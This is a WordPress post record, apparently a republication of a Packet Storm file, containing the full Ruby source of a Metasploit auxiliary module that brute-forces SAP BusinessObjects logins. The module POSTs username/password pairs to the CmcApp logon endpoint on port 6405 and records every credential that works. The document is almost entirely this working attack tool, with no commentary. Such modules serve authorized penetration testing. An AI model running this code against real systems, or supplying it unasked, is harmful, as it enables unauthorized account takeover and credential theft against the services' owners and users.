{"id":59385,"date":"2024-09-01T23:40:41","date_gmt":"2024-09-01T20:40:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181204\/sap_businessobjects_user_brute_web.rb.txt"},"modified":"2024-09-01T23:40:41","modified_gmt":"2024-09-01T20:40:41","slug":"sap-businessobjects-web-user-bruteforcer","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/sap-businessobjects-web-user-bruteforcer\/","title":{"rendered":"SAP BusinessObjects Web User Bruteforcer"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner<\/p>\n

def initialize
super(
‘Name’ => ‘SAP BusinessObjects Web User Bruteforcer’,
‘Description’ => ‘This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.’,
‘References’ =>
[
# General
[ ‘URL’, ‘http:\/\/spl0it.org\/files\/talks\/source_barcelona10\/Hacking%20SAP%20BusinessObjects.pdf’ ]],
‘Author’ => [ ‘Joshua Abraham <jabra[at]rapid7.com>’ ],
‘License’ => MSF_LICENSE
)<\/p>\n

register_options(
[
Opt::RPORT(6405),
])
register_autofilter_ports([ 6405 ])
end<\/p>\n

def run_host(ip)
res = send_request_cgi({
‘uri’ => “\/PlatformServices\/service\/app\/logon.object”,
‘method’ => ‘GET’
}, 25)
return if not res<\/p>\n

each_user_pass { |user, pass|
enum_user(user,pass)
}
end<\/p>\n

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n

login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def enum_user(user, pass)
vprint_status(“#{rhost}:#{rport} – Trying username:’#{user}’ password: ‘#{pass}'”)
success = false
data = ‘isFromLogonPage=true&cms=127.0.1%3A6400’
data << “&username=#{Rex::Text.uri_encode(user.to_s)}”
data << “&password=#{Rex::Text.uri_encode(pass.to_s)}”
data << ‘&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces’
begin
res = send_request_cgi({
‘uri’ => ‘\/PlatformServices\/service\/app\/logon.object’,
‘data’ => data,
‘method’ => ‘POST’,
‘headers’ =>
{
‘Connection’ => “keep-alive”,
‘Accept-Encoding’ => “gzip,deflate”,
},
}, 45)
return :abort if (!res or (res and res.code != 200))
if(res.body.match(\/Account Information\/i))
success = false
else
success = true
success
end<\/p>\n

rescue ::Rex::ConnectionError
vprint_error(“[SAP BusinessObjects] Unable to attempt authentication”)
return :abort
end<\/p>\n

if success
print_good(“[SAP BusinessObjects] Successful login ‘#{user}’ password: ‘#{pass}'”)
report_cred(
ip: rhost,
port: rport,
service_name: ‘sap-businessobjects’,
user: user,
password: pass,
proof: res.body
)
return :next_user
else
vprint_error(“[SAP BusinessObjects] failed to login as ‘#{user}’ password: ‘#{pass}'”)
return
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::AuthBruteinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘SAP BusinessObjects Web User Bruteforcer’,‘Description’ => ‘This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.’,‘References’ =>[# General[ ‘URL’, ‘http:\/\/spl0it.org\/files\/talks\/source_barcelona10\/Hacking%20SAP%20BusinessObjects.pdf’ ]],‘Author’ => [ ‘Joshua Abraham <jabra[at]rapid7.com>’ ],‘License’ => MSF_LICENSE) register_options([Opt::RPORT(6405),])register_autofilter_ports([ 6405 ])end def …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59385","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59385","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59385"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59385\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59385"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59385"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}